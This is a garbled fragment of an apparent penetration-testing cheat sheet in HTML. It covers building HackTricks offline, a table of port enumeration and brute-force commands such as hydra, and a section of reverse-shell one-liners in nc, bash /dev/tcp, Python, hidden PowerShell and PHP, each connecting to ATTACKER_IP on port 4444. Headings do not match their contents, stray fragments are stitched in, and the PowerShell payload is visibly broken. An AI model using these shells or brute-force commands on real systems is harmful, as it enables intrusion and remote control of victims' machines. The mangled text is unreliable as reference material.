Hacktricks Offline

git clone https://github.com/carlospolop/hacktricks.git cd hacktricks mkdocs build

This creates a site/ folder filled with fully linked HTML files. You can zip this folder and carry it anywhere.

socat TCP-LISTEN:8080,fork TCP:internal_host:80</code></pre> hacktricks offline

        <h3>Common Ports to Check</h3>
        <table>
            <tr><th>Port</th><th>Service</th><th>Enumeration Command</th></tr>
            <tr><td>21</td><td>FTP</td><td>ftp, hydra -L users.txt -P pass.txt ftp://target</td></tr>
            <tr><td>22</td><td>SSH</td><td>ssh user@target, hydra ssh</td></tr>
            <tr><td>80/443</td><td>HTTP/S</td><td>gobuster, nikto, curl -I</td></tr>
            <tr><td>139/445</td><td>SMB</td><td>smbclient -L //target, enum4linux</td></tr>
            <tr><td>3306</td><td>MySQL</td><td>mysql -h target -u root -p</td></tr>
            <tr><td>27017</td><td>MongoDB</td><td>mongo --host target</td></tr>
            <tr><td>6379</td><td>Redis</td><td>redis-cli -h target</td></tr>
        </table>
    </section>
<!-- Password Attacks -->
    <section id="password">
        <h2>🔐 Password Attacks</h2>
        <h3>Hash Cracking (John/Hashcat)</h3>
        <pre><code># Identify hash

hash-identifier john --list=formats

scp user@target:/remote/file local/file

nc.exe ATTACKER_IP 4444 -e cmd.exe</code></pre>

        <h3>Bash</h3>
        <pre><code>bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

0<&196;exec 196<>/dev/tcp/ATTACKER_IP/4444; sh <&196 >&196 2>&196</code></pre> git clone https://github

        <h3>Python</h3>
        <pre><code>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'</code></pre>
<h3>PowerShell (Windows)</h3>
        <pre><code>powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%0;while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0) Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();$client.Close()"</code></pre>
<h3>PHP</h3>
        <pre><code>php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'</code></pre>
    </section>
<!-- File Transfer -->
    <section id="transfer">
        <h2>📁 File Transfer</h2>
        <h3>Linux -> Linux</h3>
        <pre><code># HTTP server (attacker)

python3 -m http.server 8000